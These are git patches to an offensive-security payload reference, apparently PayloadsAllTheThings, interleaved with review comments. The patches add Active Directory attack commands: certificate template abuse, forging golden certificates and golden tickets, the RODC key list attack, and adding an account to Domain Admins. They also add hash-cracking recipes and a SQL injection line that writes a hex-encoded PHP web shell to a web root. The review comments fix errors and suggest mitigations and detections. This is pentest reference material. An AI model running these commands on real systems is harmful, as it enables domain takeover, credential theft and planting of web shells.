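Review bot: The new ESC4 blockquote is imprecise and has an unclosed quotation mark: `mspki-certificate-name-flag` is the attribute, and what the bullets below enable is its `ENROLLEE_SUPPLIES_SUBJECT` bit. Suggest `> Setting the ENROLLEE_SUPPLIES_SUBJECT bit of mspki-certificate-name-flag on a template that allows domain authentication lets an attacker with write access to the template push a misconfiguration that turns it into an ESC1 case.` The enclosing ESC4 section continues past the end of this hunk.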
@@ -2242,12 +2247,32 @@ Exploitation:
* Add the `ENROLLEE_SUPPLIES_SUBJECT` (ESS) flag to perform ESC1
```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -add enrollee_supplies_subject -property mspki-Certificate-Name-Flag
+
+ # Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template.
+ C:\>StandIn.exe --adcs --filter WebServer --ess --add
```
* Perform ESC1 and then restore the value
```ps1
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
```
+#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
+
+> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
+
+Exploitation:
+* Use [Certify.exe](https://github.com/GhostPack/Certify) to check for **UserSpecifiedSAN** flag state which refers to the `EDITF_ATTRIBUTESUBJECTALTNAME2` flag.
+ ```ps1
+ Certify.exe cas
+ ```
+* Request a certificate for a template and add an altname, even though the default `User` template doesn't normally allow to specify alternative names
+ ```ps1
+ .\Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:User /altname:DomAdmin
+ ```
+
+Mitigation:
+* Remove the flag : `certutil.exe -config "CA01.domain.local\CA01" -setreg "policy\EditFlags" -EDITF_ATTRIBUTESUBJECTALTNAME2`
+
#### ESC8 - AD CS Relay Attack
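Review bot: The ESC6 **Mitigation** line removes the flag but omits that the CA reads `policy\EditFlags` at service start, so the `certutil -setreg` change only takes effect after the Certificate Services service is restarted; suggest appending `, then restart the CA service (net stop certsvc && net start certsvc)`. The same `Certify.exe cas` check is what a defender should run periodically, since the `UserSpecifiedSAN` state on every Enterprise CA is the cheap control for this whole class. The TOC entry added for this section in the earlier hunk uses a `*` bullet and has a trailing space inside the link text (`[ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ]`), unlike its `-` siblings.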
@@ -2363,13 +2388,13 @@ ADACLScan.ps1 -Base "DC=contoso;DC=com" -Filter "(&(AdminCount=1))" -Scope subtr
#### GenericAll
* **GenericAll on User** : We can reset user's password without knowing the current password
-* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group :
- * On Windows : `net group "domain admins" spotless /add /domain`
+* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user hacker) to the Domain Admin group :
+ * On Windows : `net group "domain admins" hacker /add /domain`
* On Linux:
* using the Samba software suite :
- `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]`
+ `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'hacker%MyPassword123' -W DOMAIN -I [DC IP]`
* using bloodyAD:
- `bloodyAD.py --host [DC IP] -d DOMAIN -u AttackerUser -p MyPassword addObjectToGroup UserToAdd 'GROUP NAME'`
+ `bloodyAD.py --host [DC IP] -d DOMAIN -u hacker -p MyPassword123 addObjectToGroup UserToAdd 'GROUP NAME'`
* **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
```powershell
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 916f67e..3c5252c 100644
--- a/Methodology and Resources/Windows - Persistence.md
+++ b/Methodology and Resources/Windows - Persistence.md
@@ -29,6 +29,9 @@
* [sethc.exe](#sethc.exe)
* [Remote Desktop Services Shadowing](#remote-desktop-services-shadowing)
* [Skeleton Key](#skeleton-key)
+* [Domain](#domain)
+ * [Golden Certificate](#golden-certificate)
+ * [Golden Ticket](#golden-ticket)
* [References](#references)
@@ -381,6 +384,54 @@ Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName -Credential \Administrator
```
+## Domain
+
+### User Certificate
+
+```ps1
+# Request a certificate for the User template
+.\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User
+
+# Convert the certificate for Rubeus
+openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
+
+# Request a TGT using the certificate
+.\Rubeus.exe asktgt /user:username /certificate:C:\Temp\cert.pfx /password:Passw0rd123!
+```
+
+### Golden Certificate
+
+> Require elevated privileges in the Active Directory, or on the ADCS machine
+
+* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...`
+* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER
+ ```ps1
+ privilege::debug
+ crypto::capi
+ crypto::cng
+ crypto::certificates /systemstore:local_machine /store:my /export
+ ```
+* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx`
+* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate
+ ```ps1
+ ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123
+ ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123
+ ```
+* Finally you can request a TGT using the Certificate
+ ```ps1
+ Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123
+ ```
+
+### Golden Ticket
+
+> Forge a Golden ticket using Mimikatz
+
+```ps1
+kerberos::purge
+kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
+kerberos::tgt
+```
+
## References
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
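Review bot: In the new **Golden Certificate** steps the forged certificate is issued for `harry@lab.local` (`--SubjectAltName harry@lab.local --NewCertPath harry.pfx`) but the final `Rubeus.exe asktgt` line uses `/user:ron`; the KDC matches the requested principal against the certificate's UPN, so the example as written is inconsistent and `/user:harry` is what the preceding lines set up. The TOC hunk earlier in this commit adds `Golden Certificate` and `Golden Ticket` under `Domain` but omits the new **User Certificate** section, so a `* [User Certificate](#user-certificate)` entry is missing. For defenders the section could note that a forged certificate never appears in the CA's issued-certificates database while the resulting PKINIT logon is still logged (Event ID 4768 carries the certificate issuer and serial), which is the practical detection, and that after CA key theft the only remediation is renewing the CA with a new key pair.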
@@ -393,3 +444,4 @@ Enter-PSSession -ComputerName -Credential \Administr
* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/)
* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
+* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
From 119ae90db630a5649f343eddc847417a3f5bb59f Mon Sep 17 00:00:00 2001
From: astroicers
Date: Tue, 4 Jan 2022 14:28:17 +0800
Subject: [PATCH 17/50] Update MySQL Injection.md
fix line 426
---
SQL Injection/MySQL Injection.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md
index 7edb7e2..393ab40 100644
--- a/SQL Injection/MySQL Injection.md
+++ b/SQL Injection/MySQL Injection.md
@@ -423,7 +423,7 @@ GRANT FILE ON *.* TO 'root'@'localhost'; FLUSH PRIVILEGES;#
### Into dumpfile method
```sql
-[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
+[...] UNION SELECT 0xPHP_PAYLOAD_IN_HEX, NULL, NULL INTO DUMPFILE 'C:/Program Files/EasyPHP-12.1/www/shell.php'
[...] UNION SELECT 0x3c3f7068702073797374656d28245f4745545b2763275d293b203f3e INTO DUMPFILE '/var/www/html/images/shell.php';
```
From dfe830d1832d656a55cbf5a152c242b53597a551 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Tue, 4 Jan 2022 21:11:26 +0100
Subject: [PATCH 18/50] RODC - Read Only Domain Controller Compromise
---
.../Active Directory Attack.md | 23 +++++++++++++++++++
1 file changed, 23 insertions(+)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index b0600c7..e5dee5b 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -102,6 +102,7 @@
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [PrivExchange attack](#privexchange-attack)
+ - [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [DSRM Credentials](#dsrm-credentials)
- [DNS Reconnaissance](#dns-reconnaissance)
@@ -3119,6 +3120,27 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
```
+### RODC - Read Only Domain Controller Compromise
+
+> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
+
+**Requirements**:
+* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210)
+* **krbtgt** credentials of the RODC (-rodcKey)
+* **ID of the krbtgt** account of the RODC (-rodcNo)
+
+**Exploitation**:
+```ps1
+# keylistattack.py using SAMR user enumeration without filtering (-full flag)
+keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
+
+# keylistattack.py defining a target username (-t flag)
+keylistattack.py -kdc sever.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST
+
+# secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
+secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
+```
+
### PXE Boot image attack
PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
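Review bot: `-kdc sever.domain.local` in the second `keylistattack.py` example is a typo for `server.domain.local`. The **Requirements** block would also benefit from stating the scope of the exposure: the attack recovers only the secrets the RODC is permitted to cache, so the membership of the `Allowed RODC Password Replication Group` (and the default `Denied RODC Password Replication Group`, which covers privileged accounts) defines both what is at risk and what to audit, and the RODC's own krbtgt account (the one whose ID goes into `-rodcNo`) is the credential to protect. A **Mitigations** line saying so would make this section consistent with the neighbouring ones.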
@@ -3442,3 +3464,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
+* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
\ No newline at end of file
From 4642dd44fcfef8f99849a34a2a3bd1783e545d45 Mon Sep 17 00:00:00 2001
From: clem9669 <18504086+clem9669@users.noreply.github.com>
Date: Wed, 5 Jan 2022 18:25:31 +0000
Subject: [PATCH 19/50] Update Hash Cracking.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Hey 👋
Updating content with more information and more accurate resources.
---
Methodology and Resources/Hash Cracking.md | 64 +++++++++++++++-------
1 file changed, 43 insertions(+), 21 deletions(-)
diff --git a/Methodology and Resources/Hash Cracking.md b/Methodology and Resources/Hash Cracking.md
index c720725..c598774 100644
--- a/Methodology and Resources/Hash Cracking.md
+++ b/Methodology and Resources/Hash Cracking.md
@@ -5,7 +5,7 @@
* [Hashcat](https://hashcat.net/hashcat/)
* [Hashcat Example Hashes](https://hashcat.net/wiki/doku.php?id=example_hashes)
* [Hashcat Install](#hashcat-install)
- * [Brute-Force](#brute-force)
+ * [Mask attack](#mask-attack)
* [Dictionary](#dictionary)
* [John](https://github.com/openwall/john)
* [Usage](#john-usage)
@@ -25,8 +25,40 @@ apt install checkinstall git -y
git clone https://github.com/hashcat/hashcat.git && cd hashcat && make -j 8 && make install
```
+1. Extract the hash
+2. Get the hash format: https://hashcat.net/wiki/doku.php?id=example_hashes
+3. Establish a cracking stratgy based on hash format (ex: wordlist -> wordlist + rules -> mask -> combinator mode -> prince attack -> ...)
+4. Enjoy plains
+5. Review strategy
+6. Start over
-### Brute-Force
+### Dictionary
+
+> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.
+
+```powershell
+hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file -r $my_rules
+```
+
+* Wordlists
+ * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/)
+ * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z)
+ * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z)
+ * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z)
+ * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz)
+ * [hashmob.net](https://hashmob.net/research/wordlists)
+ * [clem9669/wordlists](https://github.com/clem9669/wordlists)
+
+* Rules
+ * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/)
+ * [nsa-rules](https://github.com/NSAKEY/nsa-rules)
+ * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule)
+ * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule)
+ * [clem9669/hashcat-rule](https://github.com/clem9669/hashcat-rule)
+
+### Mask attack
+
+Mask attack is an attack mode which optimize brute-force.
> Every possibility for a given character set and a given length (i.e. aaa, aab, aac, ...) is hashed and compared against the target hash.
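Review bot: The dictionary example on the `hashcat --attack-mode 0` line hard-wires `-r $my_rules`, so it errors for a reader who has not set a rules file even though the surrounding text treats rules as an add-on; show the flag as optional, `hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file [-r $my_rules]`, or give the plain form first and the rules form second. Two wording slips in the same hunk: `stratgy` in step 3 should read `strategy`, and `Mask attack is an attack mode which optimize brute-force` should read `Mask attack is an attack mode which optimizes brute-force`. Step 4's `Enjoy plains` is cracker jargon for recovered plaintexts; `Enjoy the recovered plaintexts ("plains")` keeps the term while explaining it.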
@@ -71,25 +103,7 @@ hashcat --attack-mode 3 --custom-charset1 "?u" --custom-charset2 "?l?u?d" --cust
| ?a | ?l?u?d?s |
| ?b | 0x00 - 0xff |
-### Dictionary
-> Every word of a given list (a.k.a. dictionary) is hashed and compared against the target hash.
-
-```powershell
-hashcat --attack-mode 0 --hash-type $number $hashes_file $wordlist_file
-```
-
-* Wordlists
- * [packetstorm](https://packetstormsecurity.com/Crackers/wordlists/)
- * [weakpass_3a](https://download.weakpass.com/wordlists/1948/weakpass_3a.7z)
- * [weakpass_3](https://download.weakpass.com/wordlists/1947/weakpass_3.7z)
- * [Hashes.org](https://download.weakpass.com/wordlists/1931/Hashes.org.7z)
- * [kerberoast_pws](https://gist.github.com/edermi/f8b143b11dc020b854178d3809cf91b5/raw/b7d83af6a8bbb43013e04f78328687d19d0cf9a7/kerberoast_pws.xz)
-* Rules
- * [One Rule to Rule Them All](https://notsosecure.com/one-rule-to-rule-them-all/)
- * [nsa-rules](https://github.com/NSAKEY/nsa-rules)
- * [hob064](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/hob064.rule)
- * [d3adhob0](https://raw.githubusercontent.com/praetorian-inc/Hob0Rules/master/d3adhob0.rule)
## John
@@ -103,6 +117,9 @@ john passwd
# Use a specific wordlist
john --wordlist= passwd
+# Use a specific wordlist with rules
+john --wordlist= passwd --rules=Jumbo
+
# Show cracked passwords
john --show passwd
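Review bot: The new `john --wordlist= passwd --rules=Jumbo` line copies the empty `--wordlist=` value from the example above it, so the reader is never shown where the wordlist path goes; `john --wordlist=$wordlist_file --rules=Jumbo passwd` would make the example self-explanatory. With no file given john presumably falls back to its default list, but an explicit placeholder is clearer and matches the `$wordlist_file` convention used in the hashcat examples of this file.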
@@ -127,16 +144,21 @@ john --restore
* [How To Build A Password Cracking Rig - 5000$](https://www.netmux.com/blog/how-to-build-a-password-cracking-rig)
* Online cracking
* [Hashes.com](https://hashes.com/en/decrypt/hash)
+ * [hashmob.net](https://hashmob.net/): great community with Discord
* Use the `loopback` in combination with rules and dictionary to keep cracking until you don't find new passsword: `hashcat --loopback --attack-mode 0 --rules-file $rules_file --hash-type $number $hashes_file $wordlist_file`
## Online Cracking Resources
-* [hashes.com](https://hashes.com)
+* ~~[hashes.com](https://hashes.com)~~
* [crackstation](https://crackstation.net)
+* [Hashmob](https://hashmob.net/)
## References
* [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking)
* [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/)
+* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript)
+* [digtvbg.com](https://digtvbg.com/files/books-for-hacking/Hash%20Crack%20-%20Password%20Cracking%20Manual%20%28v2.0%29%20by%20Joshua%20Picolet.pdf)
+* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript)
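Review bot: The `~~[hashes.com](https://hashes.com)~~` strike-through under Online Cracking Resources conflicts with the `Online cracking` tip earlier in this same patch, which still lists hashes.com as a working service and adds hashmob beside it; the site that went offline is hashes.org (the Active Directory file in patch 25 strikes that one), so this looks like a mix-up — either restore the hashes.com entry or strike the intended one. Since these are third-party lookup services, the section would also benefit from the caveat the AD page already carries: submitting a hash to an online cracker hands it to the operator, so use them only for hashes that are not confidential, e.g. `> :warning: Only submit hashes that are not confidential (CTF/challenge material); you lose control of anything you upload.`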
From f0085e158b16752c5dc350b7756bc5d9a2606570 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Wed, 5 Jan 2022 22:22:08 +0100
Subject: [PATCH 20/50] Removing potential DMCA material
---
Methodology and Resources/Hash Cracking.md | 1 -
1 file changed, 1 deletion(-)
diff --git a/Methodology and Resources/Hash Cracking.md b/Methodology and Resources/Hash Cracking.md
index c598774..619921f 100644
--- a/Methodology and Resources/Hash Cracking.md
+++ b/Methodology and Resources/Hash Cracking.md
@@ -160,5 +160,4 @@ john --restore
* [Cracking - The Hacker Recipes](https://www.thehacker.recipes/ad-ds/movement/credentials/cracking)
* [Using Hashcat to Crack Hashes on Azure](https://durdle.com/2017/04/23/using-hashcat-to-crack-hashes-on-azure/)
* [miloserdov.org hashcat](https://miloserdov.org/?p=5426&PageSpeed=noscript)
-* [digtvbg.com](https://digtvbg.com/files/books-for-hacking/Hash%20Crack%20-%20Password%20Cracking%20Manual%20%28v2.0%29%20by%20Joshua%20Picolet.pdf)
* [miloserdov.org john](https://miloserdov.org/?p=4961&PageSpeed=noscript)
From 2f551d6bb5d98023185705441dda970280392968 Mon Sep 17 00:00:00 2001
From: Flower Dev <67862441+Flower-dev@users.noreply.github.com>
Date: Thu, 13 Jan 2022 21:18:12 +0100
Subject: [PATCH 21/50] BOOKS.md : new books
---
BOOKS.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/BOOKS.md b/BOOKS.md
index 9267f52..ddd5422 100644
--- a/BOOKS.md
+++ b/BOOKS.md
@@ -32,6 +32,7 @@
- [The Hacker Playbook 2: Practical Guide to Penetration Testing by Peter Kim (2015)](https://www.goodreads.com/book/show/25791488-the-hacker-playbook-2)
- [The Hacker Playbook 3: Practical Guide to Penetration Testing (Red Team Edition) by Peter Kim (2018)](https://www.goodreads.com/book/show/40028366-the-hacker-playbook-3)
- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi (2009)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
+- [The Hardware Hacking Handbook by Jasper van Woudenberg & Colin O'Flynn (2022)](https://nostarch.com/hardwarehacking)
- [The Mobile Application Hacker's Handbook by Dominic Chell et al. (2015)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
- [The Shellcoders Handbook by Chris Anley et al. (2007)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto (2011)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
From 7775ce25845ae3e789d5275a169c6aa8baad3488 Mon Sep 17 00:00:00 2001
From: Flower Dev <67862441+Flower-dev@users.noreply.github.com>
Date: Thu, 13 Jan 2022 21:23:47 +0100
Subject: [PATCH 22/50] BOOKS.md: add books
---
BOOKS.md | 3 +++
1 file changed, 3 insertions(+)
diff --git a/BOOKS.md b/BOOKS.md
index ddd5422..d6b092f 100644
--- a/BOOKS.md
+++ b/BOOKS.md
@@ -23,8 +23,11 @@
- [Pratical Binary Analysis: Build Your Own Linux Tools for Binary instrumentation, Analysis, and Disassembly by Dennis Andriesse (2019)](https://nostarch.com/binaryanalysis)
- [Pratical Forensic Imaging: Securing Digital Evidence with Linux Tools by Bruce Nikkel (2016)](https://nostarch.com/forensicimaging)
- [Pratical IoT Hacking: The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou and Beau Woods (2021)](https://nostarch.com/practical-iot-hacking)
+-[Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday)
+- [Practical Social Engineering: A Primer for the Ethical Hacker by Joe Gray (2022)](https://nostarch.com/practical-social-engineering)
- [Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski (2019)](https://nostarch.com/bughunting)
- [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, and Sergey Bratus (2019)](https://nostarch.com/rootkits)
+- [The Art of Cyberwarfare: An Investigator's Guide to Espionage, Ransomware, and Organized Cybercrime by Jon DiMaggio (2022)](https://nostarch.com/art-cyberwarfare)
- [The Car Hacker's Handbook: A Guide for the Penetration Tester by Craig Smith (2016)](https://nostarch.com/carhacking)
- [The Browser Hacker's Handbook by Wade Alcorn et al. (2014)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
- [The Database Hacker's Handbook, David Litchfield et al. (2005)](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
From c90cb69def5e9dfb1e6ff1ea6c79f8a302f3a1f5 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 13 Jan 2022 21:48:21 +0100
Subject: [PATCH 23/50] Update BOOKS.md
---
BOOKS.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/BOOKS.md b/BOOKS.md
index d6b092f..1ef26c3 100644
--- a/BOOKS.md
+++ b/BOOKS.md
@@ -23,7 +23,7 @@
- [Pratical Binary Analysis: Build Your Own Linux Tools for Binary instrumentation, Analysis, and Disassembly by Dennis Andriesse (2019)](https://nostarch.com/binaryanalysis)
- [Pratical Forensic Imaging: Securing Digital Evidence with Linux Tools by Bruce Nikkel (2016)](https://nostarch.com/forensicimaging)
- [Pratical IoT Hacking: The Definitive Guide to Attacking the Internet of Things by Fotios Chantzis, Ioannis Stais, Paulino Calderon, Evangelos Deirmentzoglou and Beau Woods (2021)](https://nostarch.com/practical-iot-hacking)
--[Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday)
+- [Practical Doomsday: A User's Guide to the End of the World by Michal Zalewski (2022)](https://nostarch.com/practical-doomsday)
- [Practical Social Engineering: A Primer for the Ethical Hacker by Joe Gray (2022)](https://nostarch.com/practical-social-engineering)
- [Real-World Bug Hunting: A Field Guide to Web Hacking by Peter Yaworski (2019)](https://nostarch.com/bughunting)
- [Rootkits and Bootkits: Reversing Modern Malware and Next Generation Threats by Alex Matrosov, Eugene Rodionov, and Sergey Bratus (2019)](https://nostarch.com/rootkits)
From 171a6f2b21287317f96a3a71f80315da7b10d89e Mon Sep 17 00:00:00 2001
From: int0x80
Date: Fri, 14 Jan 2022 18:39:52 -0600
Subject: [PATCH 24/50] Command Injection space alternatives
---
Command Injection/README.md | 18 ++++++++++++++++++
1 file changed, 18 insertions(+)
diff --git a/Command Injection/README.md b/Command Injection/README.md
index a4e0d0b..9df048a 100644
--- a/Command Injection/README.md
+++ b/Command Injection/README.md
@@ -96,6 +96,16 @@ Commands execution without spaces, $ or { } - Linux (Bash only)
IFS=,;`cat<</tmp/hi<
Date: Tue, 18 Jan 2022 22:52:58 +0100
Subject: [PATCH 25/50] Update Active Directory Attack.md
Correcting typo
Removing dead website
Adjusting techniques
---
.../Active Directory Attack.md | 13 ++++++++-----
1 file changed, 8 insertions(+), 5 deletions(-)
diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md
index e5dee5b..04f6c0a 100644
--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -1254,14 +1254,15 @@ Useful when you want to have the clear text password or when you need to make st
Recommended wordlists:
- rockyou (available in Kali Linux)
-- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound)
-- Collection #1 (passwords from Data Breaches, might be illegal to possess)
+- Have I Been Pwned founds (https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM))
+- Weakpass.com
+- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md)
```powershell
# Basic wordlist
# (-O) will Optimize for 32 characters or less passwords
# (-w 4) will set the workload to "Insane"
-$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2
+$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2
# Generate a custom mask based on a wordlist
$ git clone https://github.com/iphelix/pack/blob/master/README
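Review bot: `Have I Been Pwned founds` is cracker jargon that a reader outside the community will not parse; spell it out as `Have I Been Pwned v8 NTLM — cracked entries ("founds") hosted on hashmob`. The patch also drops the `might be illegal to possess` caveat that came with the Collection #1 entry, yet the HIBP and Weakpass lists are likewise compiled from breach data, so a short note that possession and use of breach-derived wordlists may be restricted by local law and by the engagement's rules would be prudent to keep.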
@@ -1270,7 +1271,9 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
```
:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like :
-- [hashes.org](https://hashes.org/check.php)
+- ~~[hashes.org](https://hashes.org/check.php)~~
+- [hashmob.net](https://hashmob.net)
+- [crackstation.net](https://crackstation.net)
- [hashes.com](https://hashes.com/en/decrypt/hash)
### Password spraying
@@ -3464,4 +3467,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
-* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
\ No newline at end of file
+* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
From a077ceab7c8a527a9948d013bb3d2f952571afc8 Mon Sep 17 00:00:00 2001
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com>
Date: Sat, 22 Jan 2022 22:57:37 +0100
Subject: [PATCH 26/50] add tools section
---
Methodology and Resources/Reverse Shell Cheatsheet.md | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 4bd3902..f276ddf 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -2,6 +2,7 @@
## Summary
+* [Tools](#tools)
* [Reverse Shell](#reverse-shell)
